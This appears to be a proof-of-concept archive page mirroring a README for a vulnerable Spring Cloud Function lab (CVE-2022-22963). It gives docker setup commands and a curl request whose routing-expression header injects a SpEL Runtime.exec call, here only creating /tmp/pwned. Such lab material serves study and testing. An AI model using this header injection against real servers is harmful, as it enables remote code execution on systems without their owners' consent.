关联漏洞
描述
Spring Cloud Function Vulnerable Application / CVE-2022-22963
介绍
# Spring Cloud Function Vulnerability(CVE-2022-22963)
Vulnerable Application to [CVE-2022-22963](https://tanzu.vmware.com/security/cve-2022-22963)
# CVE-2022-22963 Exploit Demo
https://user-images.githubusercontent.com/57348147/161266562-51d025f0-54d4-488f-ac50-2317e29bfbdf.mp4
## Build
```bash
docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963
```
## POC
```bash
curl -X POST http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp
```
#### Reference
+ [https://tanzu.vmware.com/security/cve-2022-22963](https://tanzu.vmware.com/security/cve-2022-22963)
+ [https://github.com/hktalent/spring-spel-0day-poc/blob/main/README.md](https://github.com/hktalent/spring-spel-0day-poc/blob/main/README.md)
+ [https://github.com/spring-cloud/spring-cloud-function](https://github.com/spring-cloud/spring-cloud-function)
+ [https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)
文件快照
[4.0K] /data/pocs/b29839a8f839c00348a8788057c80a8de1df9413
├── [817K] CVE-2022-22963_Demo.mp4
├── [ 528] Dockerfile
└── [1.1K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。